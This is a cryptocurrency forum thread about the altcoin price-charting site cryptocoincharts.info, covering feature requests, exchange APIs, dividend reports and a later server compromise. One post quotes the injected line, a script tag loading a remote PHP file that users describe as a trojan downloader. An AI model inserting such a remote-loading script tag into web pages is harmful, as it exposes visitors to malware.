Title: cryptocoincharts.info - bitcoin / altcoin charts
Post by: xchrix on November 19, 2012, 10:45:47 PM
Charts for all cryptocurrencies, long term with orderbook. There are many alternative cryptocurrencies to bitcoin out there for trading. Some of them are good, some of them are bad (scamcoins). Most of them had a short life. With the charts on this website you are able to see how the prices of the altcoins were going up or down. The volume of each coin shows how big the market is to check if its worth to invest.

Statistics (at 2013-12-18)

CryptoCoinCharts.info is storing 41,094,309 trades of 197 currency pairs, fetched from 24 exchanges.

Total marketcap of all Altcoins (without BTC) is 866,825.00 BTC and the total 24h volume traded with all trading pairs in the cryptocurrency altcoin universe is 1,020,760.00 BTC.

Very nice! Keep up the good work. The only thing I'd note at this time is that vircurex dumped LQC support today, so it's as dead or at least in limbo as I0.

i am thinking about adding virwox BTC/SLL
SLL is not really a cryptocurrency. do you think there would be a demand for this data?

Title: Re: cryptocoincharts.info - your new charting website
Post by: Bendur on December 21, 2012, 08:38:56 AM
Absolutely I think there would be demand for it, at least from me. I think a lot of people wonder about how SLL is doing but are too lazy to look into it because its not a cryptocurrency.

hey bendur
the API of virwox is very good coded so it was easy for me to integrate this data
please have a look at http://www.cryptocoincharts.info/orderbook.php?pair=btc-sll&market=virwox
there is BTC/SLL data now ;)

cryptocoincharts is now showing the LTC difficulty at long time charts with day is resolution
check this out: http://www.cryptocoincharts.info/period-charts.php?period=6-months&resolution=day&pair=ltc-btc&market=btc-e

difficulty data is provided from  http://litecoinscout.com <- thank you very much!

Hi xchrix, thanks for your great work!

Is it possible though that the altcoin calculator somehow uses old data?

For example 1 namecoin is listed as being worth 0.02156476 bitcoin - whereas the charts show it's rather close to 0.029...

Any thoughts?

dtuur you were right. i was using avg(price) grouped by pair.. but some of the smaller exchanges are making this calculation wrong. so now i am using the price from the market with the highest volume for each pair (mostly btc-e)

Now it works great, thanks!

One more suggestion, I assume that many people who own altcoins buy them by depositing bitcoins on btc-e for example. And so if they want to calculate profits or losses, it may be useful if there is a field for Bitcoin as well. Even though the amount in BTC will remain the same left and right, it will the users give an easy comparison with the amount of BTC invested. I may be alone with this though.

i have just added feathercoin to the charts (exchanged on vircurex and cryptonit)
FRC will also come to the site exchanged by bter.com but they have to implement an API first

in the orderbook now i am showing volume in the two currencies which are traded. very good information i think. i will try to recalculate everything to bitcoin or even USD to really compare the price movement.

in the last days MANY altcoins joined the game. i have daily added new currencies of the various exchanges. database is growing fast :) these are exciting days for altcoins.

bter.com doesnt provide an API. i am in contact with them but they werent able to provide an API for me :( so i think we have to wait some days...

yes i want to add BTC/USD from mtgox but i have to change a little bit source code for the calculations because mtgox has a lot more data to process than the other exchanges..

i just wanted to inform you, that i am working on a complete redesign of cryptocoincharts
have a first look here: http://www.cryptocoincharts.info/v2/ -> nothing spectacular on it atm

the plan is to implement all the feedback which i got the last weeks/months
also i only want to show ONE price for each currency pair (market with the most volume)
after you click on the pair you get more info + choose your desired exchange for detail data. so i want to get this more to a standard financial information website which also gives a fast overview for newbies. maybe with a small blog and some informational articles.
hope you like the idea. lets make this the best charting website! :)

It's a great site. One thing you may want to consider, if you can easily get hold of a database (maybe just yahoo/google finance?), is backing out the most liquid alt prices vs BTC to synthetic prices vs USD. I do this in a spreadsheet like everyone else i guess, but longer-term I think being able to disassociate each currency with just btc, and as an asset in its own will give a better idea of value and perhaps promote more trading options that don't involve having to buy/sell btc first.

i have added RYC and PWC today to the charts!

To a new this is kinda confusing because I see mBTC... to me this is new and wtf is it... I know that its BTC but how much LOL

1 BTC = 1000 mBTC
1 mBTC = 0.001 BTC

formatted like this it is easier to read than 0.00007 -> 0.07 mBTC

GLDcoin has been available on Cryptsy from some time ago. Would you mind adding it to your charts please?

And a suggestion: you could automatically switch between BTC/mBTC according to the coin value, e.g. when value is below 0.001, because it's hard to read with 4 or 5 zeroes ahead. I think it's not automatic now as there are some inconsistencies such as with BQC/BTC and YAC/BTC where Vircurex prices are shown as 0.000x BTC and the rest as mBTC.

Thank you very much for your great page, which I visit every day.

i tried to add finally mtgox data trough their API but mtgox is failing so hard. took me the whole night to manage to get some trades from them. their API is blocking my requests most of the time with some stupid "timeouts" . they arent even able to provide a meaningful error message. i knew mtgox is crap. but i didnt knew it was THAT bad :D

nevertheless i am trying to get the data because i think it would be valueable for some visitors. just give me some time todo some workarounds. shown data on the website can be wrong!

Just a side note: BTC-e prices are missing from the BTC/EUR currency pair chart. I think it has one of the the largest volume here ;)

Also, I think you can now safely remove Vircurex prices from the CNC, BQC and YAC charts, or at least declare them dead, since they are no longer being traded there (a huge mistake IMHO). The same applies to DVC/BTC, EZC/BTC and MEM/BTC from Cryptsy.

Thanks for such an amazing work!

you right. missed that. i have added BTC/EUR from btc-e
but i have to think about all the "dead" coins which arent traded anymore. i want to keep the historical price data for everybody to see it. have to think about how to implement this

in the meantime i have made an status page for the APIs of the different exchanges.

I love your site and use it regularly! Nice work! (Ever thought about making an app out of it? API access?)

If I could propose one feature that I miss dearly: the ability to configure which currencies are displayed. Usually, one is interested only in 2-5 currencies. In that case, one drowns in the long tables and wealth of information on your site. Would it be possible to make the list of displayed currencies configurable?

unfortunately no API for now. i could easily provide one but i think my little server isnt able to handle requests if there are many.. API is on my todolist and will be implemented sometime.
what do you need the API for?

For PPC/USD you show "cryptonit", which has almost no volume. The PPC/USD exchange with the highest volume seems to be crypto-trade (https://crypto-trade.com/trade/ppc_usd), followed by Vircurex. Also Coin Market (coinmkt.com) has PPC/USD trading pairs.

thank you for the tips. cryptonit has nearly zero volume i know but
- havent seen ppc/usd on crypto-trade, i have added it now.
- vircurex isnt providing ppc/usd trading in the future i guess
- coinmkt doesnt provide an API

I have forgot, there is also Vault of Satoshi with PPC/USD, LTC/USD and BTC/USD:

If you want, you can add it too. They seem to provide an API: https://www.vaultofsatoshi.com/api

Think BTC/USD is off on BTC-e charts. I saw BTC highest at $823.?? (think it went even higher) but you show it highest at $770.97.

FANTASTIC! Thanks! Much appreciated.
The 25 coins with most volume are more than enough, and even the coins' prices in btc. (fiat price is superfluous imho)

dividend calculation for november

    1 LTC = 30.16 USD on BTC-e
    1 LTC = 0.03051 BTC on BTC-e
    google adsense: 326 EUR
    326 EUR = 442 USD = 14.66 LTC
    a-ads.com: 0.083 BTC = 2.72 LTC
    monthly server / domain: 12 USD = -0.40 LTC
16.98 LTC dividend payout at www.cryptostocks.com

november broke all records on cryptocoincharts! it was a very good month with the highest ad income ever! due to the massive increase of the LTC price the stock price fell and also the dividend payout which is converted from EUR to LTC looks smaller. but in fact this is by far the highest dividend payout of the history of this website. thanks to all our visitors!

dividend per share = 0.01132 LTC, share price = 3.4 LTC
this is a yearly return on investment of roughly 4%
if you add a future increase of share price and also LTC/USD price i think its a solid and good investment.

Great website, I find myself using it almost daily.

One suggestion for the UI is to perhaps make it a little easier to find currency pairs. Maybe two columns or selectors where you select each one then it either displays it there or presents a link to jump to it would do the trick.

!!!Feature Announcement!!!

because cryptsy isnt able to show the BTC value of each coin balance in your balances overview (they just show the sum) i hacked together a simple script which pulls your cryptsy balances and calculates them with the current price to BTC. please have a look here:

http://www.cryptocoincharts.info/v2/tools/cryptsy_balances

please be aware that you need to input your API key/secret. this might be unsafe but i dont save your requests or results!

Yeah, something like that, or better.

Anything really, I have a litecoin domain name that I want to use, but have no firm plan about how to use it. I don't want it to gather dust. So I considered putting a chart on there because I thought that it would be uncomplicated. But apparretly it's not that easy if you want something big and live.

I'll think of something, maybe make a few links to mining sites, to a LTC forum or any other necessary litecoin information (I can figure out how to use a LTC ticker).

The url is litecoin.gl

The GL extension is Greenland, where they don't sell many litecoin - but I got a kick out of registering it (the only other TLD available for litecoin is .as).

Maybe I'll ask the guys over at the LTC forum if they think there is anything useful I could use it for (to promote the coin, of course)

PS: Good work with your website - it looks really sleek and modern and is a great resource

What I don't like about this site is that it requires connection to Google.com to work.

I have blocked Google.com by adding a line to my /etc/hosts (on Apple OS X) like this:

127.0.0.1 google.com www.google.com

This causes the charts on your website not to show up.

Can you fix this please? A site should not require Google.com to work.

this is because i am using google charts for the graphs. the library is hosted at google servers at it isnt possible to self host them. i am trying to switch to a local js library like D3 but this is a lot of work todo.

Ok, if you could do that, that would be great.

Another thing, please enforce HTTPS on the entire site. This one's easy. SSL certificates can be bought for cheap and site-wide HTTP->HTTPS forward is easy on all web servers. Without HTTPS, we can't really trust the numbers we see on the website and the traffic can be snooped.

i like the new changes and features, please keep up the good work. I'm not sure what all your working on already but can I put a note in the suggestion box? I love the 12 hour rolling price of all coins, esp with top / flop but at some point can you considering adding different intervals to choose from? Say 2 hour, 48 hour, 7 day, 14 day? Dunno if this has been suggested or if you already had it in mind but I know I would get alot of use out of it.
My second suggestion is to add a simple filter to the arbitrage page (also love that addition) to filter by pairs and exchanges (say: search only LTC, BTG, ANC on cryptsy to coins-e, etc)

Thanks for keeping this site going and giving it the overhaul, I remember when the site had like a dozen pairs and the old setup was perfect but now that there is like 100+ pairs that pile-o-list with links to graphs wasn't cutting it. The new version has really revived this site, thanks for putting the time into it.  I made sure to buy a couple shares to help out the cause too ;D

Thanks for clarifying! Actually, I get the link http://www.cryptocoincharts.info/orderbook.php?pair=lot-btc&market=coinedup as second result link on a Google search for the keywords LOT BTC. Maybe you'd need to look into that and tell Google to drop those from their cache.  :)

As for NXT / BTC, their API should be working properly again since they have moved to a new server about 2 days ago. You should be able to get their data again for your page (currently no data):

I also use the chart available at https://blockchain.info/charts/market-price?timespan=30days&showDataPoints=false&daysAverageString=1&show_header=true&scale=0&address=
Why is there such a great difference between your chart and that of www.blockchain.info
Also, it would be very halpfull to add dates to the charts.

Is it possible that You would add charts/prices based on https://www.coinmarket.io
they have few coins that sometimes take a long time to be listed even on coinedUp.

i am only able to add them if there is an public API for ther orderbook / last x trades

You know you can't beat Murphy...  :P

:D exactly... it happens ALWAYS

if you know any services/apps/websites/widgets which are using the API please inform me. maybe i make a nice list about it ;)

i will think about it how to implement

can I have more then one filter for markets? for example I only want BTC and LTC markets to display.

new feature: user registration is now available!
till now there is only one thing implemented for users: you can choose the coins you want to see as your private list.
more things will come in the future. i am very busy atm.

On the BTC chart there is only one line - so far so good:
http://www.cryptocoincharts.info/period-charts.php?period=1-year&resolution=day&pair=btc-usd&market=mtgox

On the LTC chart why are there too lines? Confusing:
http://www.cryptocoincharts.info/period-charts.php?period=1-year&resolution=day&pair=ltc-usd&market=btc-e

Btw. nice charts!

And strangely, you can't get the difficulty for LTC after December 20, 2013, either.

On the v2 charts what the yellow line represents? If I hover the mouse over it, it doesn't show an explanation.

Tip for either the v1 or v2 charts: the ability to to have a clear reading of the actual price in a dedicated spot on the main screen, like on any trading chars, Yahoo Finance, BitcoinCharts, etc.

Keep goin'!

you right. theres a problem with the difficulty line but i didnt had time to fix it because i wanted to get a better solution for all coins.
yellow line is EMA 20
your tip is good. will implement it. i am a little blind for such easy things because i work with the site everyday.

Big fan of your site! It took me while to discover there was so much more past the cluttered front page (v2).

Wouldn't it make sense to exclude the users that decided to watch all cryptocoins from /v2/coins/members_choice ? Or do you already do that?

again a new feature: investment club released

please have a look here: http://www.cryptocoincharts.info/v2/investment_club
my profile: http://www.cryptocoincharts.info/v2/investment_club/trader/1/xchrix

the investment club should be a small community of traders which want to show their trading strategy the public. visitors are able to follow their trades and maybe make the same trades. this should become a toplist by time to see the best altcoin traders. i think its more structured than twitter pumps&dumps

please open an free account if you want to try this!
any feedback for this? its not 100% finished.

Hi xchrix!

Please update ELC (elacoin) block explorer URL to http://elc.webboise.com/chain/Elacoin
Also seems that coins-e ELC statistics here http://www.cryptocoincharts.info/v2/pair/elc/btc/coins-e/10-days
is showing some incorrect values compared with https://www.coins-e.com/exchange/ELC_BTC/

made a good step forward: candlestick charts are back in v2!
with v2 i switched from google charts to D3js which is more powerful and selfhosted. but i wasnt able to show candlestick charts out of the box. just area/line/bar... managed to code this on my own in D3. you are able to switch between area chart and the new candlestick chart. i would also make this an option for my users.

I'm just glad somebody finally got the ball rolling on this one, given how interactive the btc community is it's surprising it hasn't came together sooner.

Two quick suggestions I wanted to mention though:  dunno if it'd be easy to implement/if you'd want to but---given how the markets have been lately---it'd be nice for investment club users to be able to short pairs. Like on cryptocoincharts.info/v2/investment_club_trades/open have a checkbox for "short" when picking a pair like BTC/USD and if it drops 4% then the user gains +4%. Not sure if youre into this idea but if the point is to have a top tier of users that inform others as to what good picks may be then it would help to have something like this.
Second thing I'd mention is maybe having a minimum open time on trades. On some of the lower volume pairs it could be easy for a user to open a pick on a pair, login on coins-e (or wherever) buy a few of X and shift it 20%+ with only .001btc then quickly close it, giving the appearance that they are good at making picks. Granted this really only applies to pairs that are only on one lower volume exchange like coins-e or cryptsy, but a few of these could make a user look like a financial savant.

Okay one last thing... If I right remember there used to be donation addresses on the old site but I haven't seen this on v2, maybe you should put a link/wallet address at the bottom for people to donate? I'm sure it wouldn't pull in much but maybe enough to outsource some of the coding? I guess you could raise funds faster by issuing a few shares on cryptostocks but it's just a thought, I know I could spare a litecoin here or there if it helps.

Again, great work with the site, i'm sure there are other users out there that appreciate it as much as I do.

Post by: drakoin on February 14, 2014, 01:04:54 PM
any ideas where I can find this, or do you want to implement it?

Altcoin Portfolio

I would like to input my altcoin balances (or upload a CSV)

and then be able to
* sum up the total value in BTC (*)
* sort by
** currently highest BTC value  (*)
** currently highest volatility, gains, losses
** currently highest trading volume (translated into BTC) on all markets together (*)
* see it's past week prices
* export everything as CSV
* get an alarm if a selected currency rises above / drops below a given price pair
* etc.
- you get the idea?

I think you have all the ingredients together, because you know prices, you have charts, all that. And when you have implemented the new upcoming exchanges (thanks a lot for adding them, just seen the list but they are still on "Not updated yet!") - you will have all those just-born-coins, too, which I am most interested in.

And it shouldn't be too much additional information, really. Per user it's just one more column - "my balance". Or if you provide history then it's a table (user, date, currency, balance).

My priorities would be   (*)

If you like this idea: www.tiny.cc/drakointip or www.tiny.cc/drakoinrig or BTC 1EyyjBMMHjMfx6M3Ngu4sn5M4QJ6HAtWFG

yea i know. many things are broken right now because the database is locking every second request because of heavy load and some APIs which are giving back completely wrong data. furthermore our API and website widgets were used by some big websites with a lot of traffic + so many new ltc/btc trades on all exchanges => database disaster. redesigning of some tables takes hours so i really have to think about a plan to do some refactoring with maybe 24h offline website or a week with refactoring with online website. very annoying because i have so many new features planned and already working on them.

32.84 LTC dividend for february

1 LTC = 16.16 USD on BTC-e
1 LTC = 0.02531 BTC on BTC-e
ad income: 401 EUR
401 EUR = 555.74 USD = 34.39 LTC
monthly 2x server / domain: 25 USD = -1.55 LTC
32.84 LTC dividend payout

we had a VERY good month. many visitors due to mtgox crisis, aurora hype and other new coins and exchanges. we will also release a new feature in the next days which (at least i think so) will be a next step forward for the whole altcoin community! be prepared for some news ;)

http://www.cryptocoincharts.info/v2/indices/info

This section is highly experimental, not even beta status! My goal is to provide a Priceindex calculated by all cryptocurrencies and compare it to the profits/loss to well known stock markets like DAX, S&P500 or to metals like gold and silver. The forumala for the calculation for the indices is like trial and error. I am playing around with numbers and try to find the best way. Everybody is welcome to contact me and give me inputs for the right calculation to office (at) cryptocoincharts (dot) info. Thx

I can't seem to find any worthwhile portfolios out there, so I've been cooking up something myself. So far it's just a proof of concept in a Google Spreadsheet with scripts to fetch private API data from Cryptsy and organizes the responses into sane tables and a few charts. The important part is that it all works completely automatically, all you have to do is give it the API keys. This is a feature that I think people NEED, for mining and trading, because I feel like I am shooting in the dark when trading and when holding coins on featureless sites. I am not aware of any way to manage an accounting system without huge amounts of manual data entry. Journalizing all this data and implementing inventory systems to determine balance history and profitable prices are very important to have in order to make the best decisions when brokering or even just for miners who want to sell their accumulated altcoins at the best times. WE ALL NEED THIS.

How does CryptoCoinCharts feel about offering this sort of service? I know that some people are uncomfortable with putting API keys on websites. Is this something CCC would like to pursue or stay away from? I really like the progress CCC is making, and if CCC plans to implement this feature then I would love to contribute! I'll share my work when it's done, unless anyone wants to help me with it now, I could really use the help!

As a feature request. Add the ability to see this graphically over different time periods/dates. I think this will be essential in the future to visualise how the markets are evolving and what coins to watch.  Pretty pleasewith cherries ontop

Second suggestion:

I know, donations are so easy now with cryptos - but they just don't happen yet, I am actually quite disappointed of people, once again.

if we can make some sort of development fund or something else i would be happy to work a lot more for the website. anyway i will try to implement it but it will need more time

What about going the crowdfunding path: You could offer free lifetime memberships above a certain donation level, and 300 free alerts in midrange, and a link banner on an supporter/advertisement page for small support sums.

Have a look at this thread, some people announced their kickstarter-like crowdfunding services there: https://bitcointalk.org/index.php?topic=406049 Crowdbounty.  Plus have a look at btcjam - but there you have to pay back in BTC.  Why not also consider the classical crowdfunding campaign: kickstarter, indiegogo

drakoin you really have good ideas!

Thanks a lot!  That's what I am best in: Good ideas :-)

https://www.cryptocoincharts.info/v2/coins/graphicalComparison

This shows the volume of litecoin as a 24 volume of 434,645.11 BTC - which is about $269,045,323 or 52% of the entire litecoin marketcap... supposedly traded per 24 hours?

But according to https://coinmarketcap.com/, it says the LTC 24 hour volume is $29,938,965 -- about 9x less...

Any chance you've got something like a decimal place screwed up and are accidentally showing ~10X the amount if litecoin traded than is actually?

thx for the info. btc-e is fine again

LTC volume is also right. i think coinmarketcap got it wrong. have a look at the okcoin index site https://www.okcoin.com/
it show LTC vol 24h = 16,641,388.47Ł
thats 491,911.1 BTC

i think they are manipulating the volume because its really very high but i have no chance to detect right/wrong trades

Hey xchrisx,

Crypto-Trade.com added CINNI/BTC and CINNI/USD (new pair!) by today.
https://www.crypto-trade.com/trade/cinni_btc
https://www.crypto-trade.com/trade/cinni_usd

Maybe you want to add it someday on cryptocoincharts? Would be much appreciated :)

Best,

CT

okay someone was able to inject some javascript code on the main website which was redirecting to some server
dont know what the attacker wants to do with the info but he logged the visitors. nothing is lost or stolen i guess.
i am investigating now how this was possible and trying to secure the server

why are people attacking a service website? there are no funds on it or anything else. just information..  :-\

that's true. yesterday CCC redirected me to some strange page, however my AV software didnt find any threat on that landing page, so can hope there was really no a serious threat.
Maybe there was some geofilter and only some visitors were affected.

I guess a big traffic of the site attracts ntruders. Thanks Chris for a quick fix.

A new exchange (icurrex.com (http://icurrex.com)) is opening soon! you may want to check it out.

It has an API and looks professional. I will keep an eye on it and see how it progresses.

it was a pleasure to integrate your API because its well design and worked instantly. i think i am able to rate an exchange by the implementation of the API. many new small exchanges have really bad APIs which arent working or give back wrong data sometimes. but yours is good so i think the exchange is coded clean and secure!

TO ALL SHAREHOLDERS!

i am moving the assets from cryptostocks to NXT AE because cryptostocks isnt responding to questions for months now and the wallets at cryptostocks are disabled so i am not able to pay any dividend or deposit/withdraw any LTC. also the mailing system isnt working. i tried to get in contact with all sharesholders because of the move to NXT AE but nobody received an email notification.
i do have a list of all shareholders which checked the flag in their cryptostocks account. please login now and go to your setitngs so i am able to see your email adress and can prove how many shares you have.

if the move to NXT AE is finished i will payout dividend again. sorry for the delays. trading on a distributed asset exchange should be much safer and transparent!

Yes, It got hacked. when you load it, there is JS trojan downloader. My Nod antivirus detected it and blocked it. Shame, there is no response. I own few shares, but I will sell them, this sucks, no response, no care.

The Asset on NXT Asset Exchange is ready for trading. Please open an NXT wallet and sen me the amount of shares and your NXT wallet ID to office (at) cryptocoincharts.info so i am able to transfer the right amount of shares to your account. After that feel free to trade or hold.

The new asset is also named "CCC" with ID 15019939154479467989
http://ae.nxt.org/Asset.aspx?id=15019939154479467989

If you are not familiar with NXT you will find good infos here:
http://wiki.nxtcrypto.org/wiki/Asset_Exchange
if you have further questions feel free to email me!

everybody should set the "disclose my email" flag in the user settings!
https://cryptostocks.com/settings/edit
this way i am able to see the email of each shareholder and you will get your shares transfered to your NXT trading account!

you have a security breach .. there is an ongoing CrossSite attack on your page.
Take for instance: http://www.cryptocoincharts.info/v2/api/listCoins
first line on your api return is:
Code:
<script type="text/javascript" src="http://www.cryptocoincharts.de/some.php"></script>
which pretty much looks like an exploit!

yes we are facing some problems with some hackers which are permanentely trying to hack our servers.
someone was able to inject some javascript code into the website. dont know how so i moved the whole website to a new and clean server which is hopefully more secured!

i am also confronted with blackmails to my private email. its very sad to get hacked by some guys. i dont have any funds on the servers and i dont have some big income from cryptcoincharts so i dont know why i am the target :(
securing the server and changing all passwords is very time consuming, thats why i dont have time right now for doing any development work or support. sorry for that. i am losing faith in the bitcoin community.. it looks like there are more scammers than good guys.

i am thinking about selling the whole website. if someone is interested please email me at office (at) cryptocoincharts.info

There are a few simple ways to mitigate hack attempts: try use a CDN service like cloudflare and hide your server's ip behind it after you moved to a new server, it becomes much harder to locate your actual server's ip address; chown your source files so your php process or web server cannot modify your code; change ssh port number, and disable password login and allow key authentication only, or even use port knocking (knockd) to hide your ssh service.

Don't give up ;)

It's ok, one thing at a time, we're not in a hurry.

A good server setup is always the basis of security, otherwise you can't even be sure it's your code that caused the problem. Once that is done, with proper logging, code level security issues like sql injections should be traceable at least.

About securing personal accounts, I'm not sure exactly what problem you're facing, but there's a lot of information in your domain's whois information like names and email addresses, which could be a starting point for attacks, so maybe use a different set of passwords for those email addresses from your personal accounts, and add something like domain privacy guard with your domain registrar.

Hope everything works out for you eventually.

Hi xchrix,

i know you have some troubles with your page and maybe neither the time nor the energy to care about this, but i wanted to inform you
that with the newest release of Crypto-Trade, our API has slightly changed and there might be incorrect volumes showing up: https://crypto-trade.com/api/v1/documentation

thanks man!
Keep up the great work!

Feature request:  Unselect currencies

I really like your site.  This page is informative http://www.cryptocoincharts.info/v2/coins/graphicalComparison
but it would be even better if I could switch off two coins of which I already know they are big (-:  BTC and LTC

Can you imagine to either always render the same pic without the one/two largest,
or even make it interactive, with an "(un)select coins" function?

Thanks!

I noticed in the API that there is a USD symbol but the price_btc and volume_btc are 0.

It would be nice if it was something like 1/589.53=.001696267 BTC/USD

Like this it is easy to convert for example Litecoin to USD without using any other service:

0.001696267 / 0.01205 = 0.140769046 LTC/USD

The same goes to Euro and Yuan.

I've been looking into writing a small script to access the api data but I'm having some issues understanding the data that is returned.  The listCoins section is petty self explanatory and I had no problems with that data.  Did notice a few websites that either don't work or are suspicious.  The tradingPair stuff just doesn't make sense to me.  For instance I try to do:
http://www.cryptocoincharts.info/v2/api/tradingPair/[ltc_btc]
I get the following data:
{"id":"ltc\/btc","price":"0.00914000","price_before_24h":"0.01000000","volume_first":"394184.358786482","volume_second":"3685.43083999207","volume_btc":"3685.43","best_market":"btc-e","latest_trade":"2014-08-14 03:19:06"}
but if I do:
http://www.cryptocoincharts.info/v2/api/tradingPair/[btc_ltc]
I get:
{"id":null,"price":null,"price_before_24h":null,"volume_first":null,"volume_second":null,"volume_btc":null,"best_market":null,"latest_trade":null}

Does that mean there are ltc to btc trades but no btc to ltc?  It just doesn't make sense.  Can you clarify what this data is supposed to be showing a bit?

Poloniex  also trades BTSX.

I get:
{"id":null,"price":null,"price_before_24h":null,"volume_first":null,"volume_second":null,"volume_btc":null,"best_market":null,"latest_trade":null}

The pairs are always in the xxx_btc format that most of the exchanges have (except poloniex, maybe others).

@xchrix An API call for showing the overlap of trading pairs would be cool! Possibly a POST request that takes one or many exchanges and returns the lowest common denominator (for many exchanges) and all pairs (for one exchange). This could make for some great graphs, too.

Is there some way to tell which coins are valid as currency2 in the pair then?  Also some pairs seem to work in both directions.  For example ltc_doge and doge_ltc both return data.  Kind of hard to write a program to return the data if you can't give the user valid feedback on what is and isn't acceptable as input.

Yes that's because both of these pairs actually exist. I don't know of any exchanges that offer any to any trades. Vircurex did that once but I think the money was spread around on too many markets, so that the single markets weren't traded enough. If they were arbitrage bots would be running hot for sure :)

The big markets are - besides Fiat and btc  -  ltc, ppc, doge, xmr and a few others. To find out which ones exist you could get all coins from here http://www.cryptocoincharts.info/v2/api/listCoins and then check for btc_XXX via http://www.cryptocoincharts.info/v2/api/tradingPairs . If this doesn't exist then probably XXX isn't valid.

Awesome, thanks!
What I really like about your order books is that they show the whole picture, whereas for example Mintpal or Bitcoinwisdom only display a very limited range of the full order book, which is annoying during large price swings.

Looks like the old version is gone and replaced completely with the V2 one?

I actually preferred the old charts - specifically, the volume bars were useful, rather than an averaged curve shown in the v2 charts.

However, thanks xchrisx for working on the site to overcome the traffic issues!

Just a quick question...

Would like to use the API for price information for a service. Fully intend caching data locally so as to limit api calls to say, 2 per minute or less.

Is this acceptable use?

Are you adding any new trading pairs?

2 per minutes is ok if everything runs fine. if the server needs much time to respond then its overloaded ;)
yes i am adding every new trading pair which is traded on one of the exchanges automatically.

Hello!

Some of the info at http://www.cryptocoincharts.info/coins/show/uno for Unobtanium could use an update.

Website is now:  http://unobtanium.uno
Blockexplorer:  https://chainz.cryptoid.info/uno/

I think the mining stats you need can also be pulled from Chainz api at https://chainz.cryptoid.info/api.dws

These exchanges for Uno can be dropped:
Coins-e.com, Coinex.pw,  Atomic-trade.com, Mintpal.com.

The Uno/Btc price from Cryptsy doesn't appear to be working.

Thanks! We appreciate you listing Uno.

Hey Xchrix,

I am one of those people that caused the high traffic to your site.  I would check the details of like 30 coins at least once a day, sometimes more.

I really liked your format and charts.  It was basically the best thing I had found.  I hope you get it back up!

Good luck.

What tech is the service written in?

Can you still ftp to the host?

Sorry to be so basic but trying to establish if you can do a db export and pull down all the site files?

hoster is not responsive at all. tried to contact them many times. in the meantime i tried to restore an old backup but i completely screwed up. havent checked the backup cronjob for a while and the last backup i got is 35 bytes big :( something went completely wrong  :o i do have backups but they are some months old so i tried to get the server up again. there is all the data. i really hate the whole hosting thing. so much hassle

So, any update? News?

I would like to help if possible...

it was a virtual server and i am not able to access anything on it. but it looks like the hoster wants to give me an image of the whole virtual HDD. so i will be able to extract the mysql data. hopefully he sends it to me in the next hours.

i think would also be nice to have the raw data back so we can just load it in our charting program and might be better for the site to avoid high load and save bandwidth.

just my 2c.

Ah ha - I see site back up so assume you found a solution - excellent! :)

API appears to be working fine at first look at our service.

I use a 600 second window for fresh API calls so should be fairly small [respectful] bandwidth!

looks like the site is kind of up and working again.  I am getting the webpages to open but then none of the charts are working.  I am guessing you still have a hard time getting the back data recovered.  Hope it works again!  Thanks for putting your time into it.

Would you consider adding https://exco.in?

We are a cryptocurrency exchange with high quality standards on the altcoins we trade. Our user base is growing rapidly and the last few days our BTC 24H volume has been over several hundred, today it was over 300 BTC.

API Documentation: https://api.exco.in

Hello,

I bought 2 CCC assets on cryptostocks year ago. Than you moved it to NXT assets. I checked it today and I found there were never dividends paid on Nxt. So my question is, what is the status. Of course current value of my shares is nothing, compared to what I paid for them year ago. But as a shareholder I want to know, why there were never any dividends paid and what is the current status of CCC assets.

Thank you

hey socoban. did you get your shares at NXT AE? we now have 10000 shares (compared to 1000 to cryptostocks) so you get 20 CCC shares. yes price went downwards. also because LTC is worth nothing compared to years ago.

dividends werent paid because i am not able to pay any dividends at all. at the best time i hat like 70000 visitors per day. now as altcoin interest is fading away i have like 2000 visitors a day. they arent generating hardly any ad income. adsense is rolling back most of the clicks and i tried crypto based ad networks like a-ads, coinurl or nxtad.. i am happy if i am able to pay the server bills with the ad income. so unless altcoin interest gets higher again i am not able to pay anything. currently i am working for free for this project.

hope that answers your questions.

chris

I am wondering how to complement the information on cryptoassetcharts.info (CAC)

Because I compared all 4 asset platforms (https://bitcointalk.org/index.php?topic=981128.msg10708354#msg10708354) that are mentioned in the main table of CAC (with 619 assets, from 4 platforms), and it looks as if

... NXT is the only asset platform which is really used, with considerable volume - correcto?

NHZ is still 150 times smaller (in volume). And 92% of that volume is only one asset (http://www.cryptoassetcharts.info/markets/show/nhz) ("HZxchange")?

What about
Counterparty (CAC mentions 23 assets but no volume), and
NAS (CAC mentions 14 assets but no volume), and
MSC (not even mentioned in CAC main table), and
NFD (not even mentioned in CAC main table) ? ? ?

Where can I find out trading volumes of ALL asset platforms?

About the current CAC main table ... see my mini-statistics here in posting #11 (https://bitcointalk.org/index.php?topic=981128.msg10708354#msg10708354).

EDIT: I actually found another source of data (https://bitcointalk.org/index.php?topic=981128.msg10709843#msg10709843), but with little overlap somehow.

Hey xchrix!

I am wondering how exactly your "Trading volume 30 days recalculated to BTC" is calculated.
And if perhaps my own calculations have some flaw that I am unable to see at the moment. Please help.

... today I succeeded in a rather precise calculation of all the trades of my asset, by actually looking at each single trade, and converting them to their momentary BTC, and USD value - and only then summing up all trades.  For details have a look here: https://bitcointalk.org/index.php?topic=998804.msg11066072#msg11066072

I get
... and summing up all sellers:
Code:
totals traded: 1306774 assets for 4474224HZ ~ 4.4652BTC ~ 1120.03USD (at averages: USD=3994HZ, BTC=250.84USD)

While your page www.cryptoassetcharts.info/assets/show/647 (thx a lot! Great page!) ...
... mentions it as

Code:
Trading volume 30 days recalculated to BTC	2.9082456 BTC

Of course, all values are always approximations, and there is a lot of volatility in these markets - I was just wondering about this divergence, and I am trying to understand it.

Enjoy your Sunday  ;)

Website is now:  http://unobtanium.uno

It would be good to see the mining/difficulty states.  Diff today is about 50 million.

i loooove your api and data collection! so awesome!

but! could you add a total-volume-per-exchange api call? i want to implement some weighted averaging based on exchange volume, but atm would need to do extra api calls for it .. if there was a list of exchange info with total volume , like the coin list on https://api.cryptocoincharts.info/ , that would really help me do less calls :)

We're getting the website ready to become your only crypto comparison platform:

Just a few short updates:

new exchanges added:
- liqui
- bittylicious
- coinfloor
- gemini
- itbit
- lakebtc

- fixed a bunch of errors - too many to write
- added 50 new trading pairs, 3 new FIAT currencies

Your support and feedback is much appreciated and welcomed.

Great site!

We built a NEO (AntShares/ANS) Blockchain Explorer at https://neotracker.io. We would be delighted if it could be included on the NEO (ANS) page at http://cryptocoincharts.info/coins/show/ans. Let us know if there's anything you need from us.

Hi,

A possible problem with links from other sites that have the URL rewritten or redirected...

For example, I click this link ...
http://www.cryptocoincharts.info/v2/pair/uno/btc/averageprice/5-days

...and the browser continues to this URL, where the chart doesn't render properly.

https://cryptocoincharts.info//pair/uno/btc/averageprice/5-days

